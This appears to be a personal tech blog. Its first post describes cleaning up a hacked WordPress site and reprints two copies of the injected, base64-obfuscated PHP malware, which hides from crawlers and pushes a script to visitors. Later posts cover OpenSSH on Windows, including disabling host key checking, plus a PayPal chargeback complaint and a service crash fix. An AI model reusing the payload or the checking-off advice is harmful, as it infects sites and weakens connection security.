They were hitting to same file (index.php) over and over, although I had cleaned up all the other codes they had added, whatever they were sending to index.php was adding everything back to the websites. This attack would fly uncaught since they are adding iframe into the code which wouldn’t bother you or visitors if it is not interpreted right by your browser (blocked by addons etc.) but if you leave the hole open, they can query database – extract information, open other holes for themselves and pretty much anything a mutant would do.

Here is the solution.
If you are facing the same situation, you need to find POST logs in access.log. This command:

#grep POST access.log

would allow you to see where they are perpetrating and you need to remove those files.

http/access.log:50.73.176.163 - - [29/Nov/2011:00:37:42 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 257
http/access.log:212.122.48.43 - - [29/Nov/2011:01:37:50 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215
http/access.log:69.64.46.85 - - [29/Nov/2011:02:37:43 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:79.98.242.246 - - [29/Nov/2011:03:10:09 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215
http/access.log:64.90.52.173 - - [29/Nov/2011:03:40:33 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 178
http/access.log:122.248.194.9 - - [29/Nov/2011:04:40:48 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 342
http/access.log:50.57.155.37 - - [29/Nov/2011:06:40:59 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215
http/access.log:189.17.169.186 - - [29/Nov/2011:07:41:50 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:195.218.148.226 - - [29/Nov/2011:08:33:45 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 159
http/access.log:84.235.45.241 - - [29/Nov/2011:08:40:15 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:174.142.19.205 - - [29/Nov/2011:09:39:52 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 220
http/access.log:119.75.23.81 - - [29/Nov/2011:10:39:53 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 257
http/access.log:85.13.72.233 - - [29/Nov/2011:11:39:38 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:146.23.176.12 - - [29/Nov/2011:12:39:52 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215

eval(base64_decode
('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlk
ZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2
h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIu
Y29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycn
JyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdz
em4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2
lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42
OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOT
EuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIp
LA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKS
wNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0K
CWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA
0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXko
IjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS
4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4y
NTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQ
oJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydS
RU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJE
lQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlf
aXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2
lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFr
O30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdG
xQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5
YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1
pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9L
WHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWE
dJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkeUlHNG9OU2w3TXlCaVBWd25kMXduT3pNZ1l6MW9JR1VvS1R0cktE
TWdhVDB3TzJrOGVEdHBLeXNwZTJOYllpNW1LR2srUGpRcEsySXVaaWhwSm5VcFhUMTBMbkVvYVNsOU5pZ2hOUzV6S0M5ZVcyRXRkaTA1WFNva0wya3BLVz
hnZVRzMktEVXVaeVV5S1RVOVhDY3dYQ2NyTlRzeklHdzlOUzVuT3pNZ056MW9JR1VvS1RzeklHbzlNRHRyS0RNZ2FUMHdPMms4YkR0cEt6MHlLWHMzVzJv
cksxMDlZMXMxTGtFb2FTd3lLVjE5YnlBM0xub29YQ2RjSnlsOU5pZzRMbTB1UXloY0ozQTlaRnduS1QwOUxURXBlemd1UWlodUtGd25SRnduS1NrN09DNX
RQVnduY0Qxa1hDZDlKeXcwTUN3ME1Dd25mSHg4ZG1GeWZIeGtZWFJoZkdsbWZISmxjM1ZzZEh4a2IyTjFiV1Z1ZEh4OGZHSXhObDlrYVdkcGRITjhZakUy
WDIxaGNIeGxibUZpYkdWa2ZFRnljbUY1ZkdOb1lYSkJkSHhzWlc1bmRHaDhibVYzZkh4OFptOXlmR3hzZkdOdmIydHBaWHhvUkdOa2ZISmxkSFZ5Ym54am
IyOXJhV1Y0ZkdaeWIyMURhR0Z5UTI5a1pYeG1kVzVqZEdsdmJueHRZWFJqYUh4VGRISnBibWQ4TVRWOFpqQjhNREV5TXpRMU5qYzRPV0ZpWTJSbFpud3lO
VFo4Wm1Gc2MyVjhhbTlwYm54emRXSnpkSEo4ZDNKcGRHVjhhVzVrWlhoUFpud3pZelkwTmprM05qSXdOek0zTkRjNU5tTTJOVE5rTWpJM01EWm1Oek0yT1
RjME5qazJaalpsTTJFeU1EWXhOakkzTXpabU5tTTNOVGMwTmpVellqSXdObU0yTlRZMk56UXpZVEl3TW1Rek1UTTVNemt6Tmpjd056Z3pZakl3TnpRMlpq
Y3dNMkV5TURKa016SXpPVE01TXpjM01EYzRNMkl5TWpObE0yTTJPVFkyTnpJMk1UWmtOalV5TURjM05qazJORGMwTmpnelpESXlNek16TURJeU1qQTJPRF
kxTmprMk56WTROelF6WkRJeU16UXpNREl5TWpBM016Y3lOak16WkRJeU5qZzNORGMwTnpBellUSm1NbVkyTVRjMU56TTNNamM0TnpZMk9UWXhNekUyTlRj
d05tUTJOREpsTmpNMk5USmxObVEzTXpKbU5qa3laVGN3TmpnM01ETm1OamMyWmpOa016RXlNak5sTTJNeVpqWTVOalkzTWpZeE5tUTJOVE5sTTJNeVpqWT
BOamszTmpObEp5NXpjR3hwZENnbmZDY3BMREFzZTMwcEtUd3ZjMk55YVhCMFBnPT0iKTsNCn0='));

eval(base64_decode
('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlk
ZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2
h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIu
Y29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycn
JyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdz
em4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2
lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42
OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOT
EuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIp
LA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKS
wNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0K
CWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA
0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXko
IjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS
4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4y
NTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQ
oJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydS
RU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJE
lQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlf
aXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2
lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFr
O30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdG
xQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5
YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1
pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9L
WHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWE
dJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkeUlHNG9OU2w3TXlCaVBWd25kMXduT3pNZ1l6MW9JR1VvS1R0cktE
TWdhVDB3TzJrOGVEdHBLeXNwZTJOYllpNW1LR2srUGpRcEsySXVaaWhwSm5VcFhUMTBMbkVvYVNsOU5pZ2hOUzV6S0M5ZVcyRXRkaTA1WFNva0wya3BLVz
hnZVRzMktEVXVaeVV5S1RVOVhDY3dYQ2NyTlRzeklHdzlOUzVuT3pNZ056MW9JR1VvS1RzeklHbzlNRHRyS0RNZ2FUMHdPMms4YkR0cEt6MHlLWHMzVzJv
cksxMDlZMXMxTGtFb2FTd3lLVjE5YnlBM0xub29YQ2RjSnlsOU5pZzRMbTB1UXloY0ozQTlaRnduS1QwOUxURXBlemd1UWlodUtGd25SRnduS1NrN09DNX
RQVnduY0Qxa1hDZDlKeXcwTUN3ME1Dd25mSHg4ZG1GeWZIeGtZWFJoZkdsbWZISmxjM1ZzZEh4a2IyTjFiV1Z1ZEh4OGZHSXhObDlrYVdkcGRITjhZakUy
WDIxaGNIeGxibUZpYkdWa2ZFRnljbUY1ZkdOb1lYSkJkSHhzWlc1bmRHaDhibVYzZkh4OFptOXlmR3hzZkdOdmIydHBaWHhvUkdOa2ZISmxkSFZ5Ym54am
IyOXJhV1Y0ZkdaeWIyMURhR0Z5UTI5a1pYeG1kVzVqZEdsdmJueHRZWFJqYUh4VGRISnBibWQ4TVRWOFpqQjhNREV5TXpRMU5qYzRPV0ZpWTJSbFpud3lO
VFo4Wm1Gc2MyVjhhbTlwYm54emRXSnpkSEo4ZDNKcGRHVjhhVzVrWlhoUFpud3pZelkwTmprM05qSXdOek0zTkRjNU5tTTJOVE5rTWpJM01EWm1Oek0yT1
RjME5qazJaalpsTTJFeU1EWXhOakkzTXpabU5tTTNOVGMwTmpVellqSXdObU0yTlRZMk56UXpZVEl3TW1Rek1UTTVNemt6TVRjd056Z3pZakl3TnpRMlpq
Y3dNMkV5TURKa016SXpPVE01TXpNM01EYzRNMkl5TWpObE0yTTJPVFkyTnpJMk1UWmtOalV5TURjM05qazJORGMwTmpnelpESXlNelF6TURJeU1qQTJPRF
kxTmprMk56WTROelF6WkRJeU16TXpNREl5TWpBM016Y3lOak16WkRJeU5qZzNORGMwTnpBellUSm1NbVkyWmpaaU16VXpOalkzTnpBMlpUYzFNemt6T1Ra
bU1tVTJNelkxTW1VMlpEY3pNbVkyT1RKbE56QTJPRGN3TTJZMk56Wm1NMlF6TVRJeU0yVXpZekptTmprMk5qY3lOakUyWkRZMU0yVXpZekptTmpRMk9UYz
JNMlVuTG5Od2JHbDBLQ2Q4Snlrc01DeDdmU2twUEM5elkzSnBjSFErIik7DQp9'));'));

Could not create directory ‘/home/xxx/.ssh’.
The authenticity of host can’t be established.
Failed to add the host to the list of known hosts (/home/xxx/.ssh/known_hosts)

It is very annoying to type in Yes everytime trying to connect to a server so I decided to do some research but couldn’t find solution.

I found my solution this way:

-Create  a file in your hard drive (wherever you feel like), I have created mine under: c:\users\myusername\known_hosts (ex: c:\users\john\known_hosts)
-find ssh_config under OpenSSH\etc\ folder and add this line

UserKnownHostsFile c:/users/john/known_hosts

 After you add this line, try to connect and you won’t have to type in “Yes” anymore. If you would like to disable known_hosts file check completely, you can also change this line:
StrictHostKeyChecking yes

to

StrictHostKeyChecking no

 That will allow you avoid known_hosts from get go.

If you want to do public key authentication but you are not able to use ssh-keygen to create because you are getting:

Generating public/private rsa key pair.
Enter file in which to save the key (/home/xxx/.ssh/id_rsa):
Could not create directory ‘/home/xxx/.ssh’.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
open /home/xxx/.ssh/id_rsa failed: No such file or directory.
Saving the key failed: /home/xxx/.ssh/id_rsa.

You can run ssh-keygen uder c:\program files\openssh\bin\ folder  with this:

ssh-keygen -t rsa -f id_rsa

-f switch would allow you to add a filename. Once you create the public and private key (for this example: id_rsa and id_rsa.pub) go back to your c:\program files\openssh\etc\ssh_config file and remove # from
#IdentityFile ~/.ssh/id_rsa

and point it to your new file:

IdentityFile c:/program files/openssh/bin/id_rsa

I sold something using PayPal about 4 months ago. It was our mistake that we had shipped the wrong product to the customer. After we received complaints, we requested proof (photo in this case) and tried to work with customer. He/She didn’t feel secure with the transaction and opened a dispute with credit card company (AMEX). At that point, we had already reached to an agreement and we had shipped a new product to customer’s address. However, the dispute became an international problem (sarcasm).

AMEX and PayPal started 80 days no-talk, no-action dispute resolution process. Customer had already received two products and I had made payments to manufacturer for both products. So I was tripple screwed. I called PayPal multiple times, hearing all their sorry voice and apologies but no result. Customer called AMEX 3 times, no result. So finally, I received an email today saying, PayPal was able to resolve the situation in our favour after 80 days of waiting.

However, PayPal didn’t do anything to resolve it, the reality of the situation is totally different then as they state in their email.

PayPal’s Chargeback process when a dispute issued directly with Credit Card company by a customer:

1-Customer calls Credit Card company and opens the dispute
2-PayPal dispute resolution center emails you and asks you for evidence
3-Upon receiving your evidence, PayPal sends it to AMEX
3.1-AMEX puts hold on any payment to PayPal
3.2-!!!PayPal waits for you to do one more transaction. As soon as you try to send money to somebody or make a purchase, they combine all the debt with that transaction and charge your credit card or bank account. As far as PayPal Chargeback Center told me, if you don’t make any purchase/transaction on PayPal account, they will for 90 days then start the collection process.
4-You are helpless. PayPal recovered her lost and that’s all they care about.
5-Phone calls to PayPal by me and AMEX by customer didn’t make any difference.

PayPal Chargeback – Dispute center clearly told me that after they submit the evidence to credit card company, it is all their decision and PayPal will have to go with that. I asked what PayPal could do if AMEX had decided to hold onto money after 80 days. They said, they would send a courtesy note to the customer on my behalf, to return the product or make another payment but that was all.

So, as an advise to fellow merchants who would like to use PayPal as a payment option, do not sell anything more then $100 worth or be ready to lose money. Paypal will not defend your rights or money.

“Could not start the OpenSSH Server service on Local Computer. Error 1067: The process terminated unexpectedly.”

I added the details of the errors I experienced.

Solution: The main problem to this issue is having multiple cygwin1.dll on your computer and have one of them on the PATH variable.

1- In order to fix this issue, you first need to find out which folders/applications might have cygwin1.dll file under it.
2- Check the PATH variable via right click on My Computer -> Properties -> Advanced System Settings -> Environment Variables
Under this section, you will find two PATH variables. First one if for the user level (your login) and the second one is for System level (for all users on that machine). You should make sure both PATH variables do not include any folder that you found in the first step.

Error 1067: The process terminated unexpectedly
Faulting application name: cygrunsrv.exe, version: 0.0.0.0, time stamp: 0×40826252
Faulting module name: ntdll.dll, version: 6.1.7600.16559, time stamp: 0x4ba9b21e
Exception code: 0xc0000005
Fault offset: 0x00055c11
Faulting process id: 0xd10
Faulting application path: C:\Program Files\OpenSSH\bin\cygrunsrv.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll

Windows 7 Detailed message:

Fault bucket , type 0
Event Name: APPCRASH
Response: Not available
Cab Id: 0

Problem signature:
P1: cygrunsrv.exe
P2: 0.0.0.0
P3: 40826252
P4: ntdll.dll
P5: 6.1.7600.16559
P6: 4ba9b21e
P7: c0000005
P8: 00055c11
P9:
P10:

Attached files:
C:\Windows\Temp\WER4B72.tmp.appcompat.txt
C:\Windows\Temp\WER4BA1.tmp.WERInternalMetadata.xml
C:\Windows\Temp\WER4C02.tmp.WERDataCollectionFailure.txt

These files may be available here:
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_cygrunsrv.exe_22de35eb95b016db589883555d246a6efe89f540_cab_15c74bfe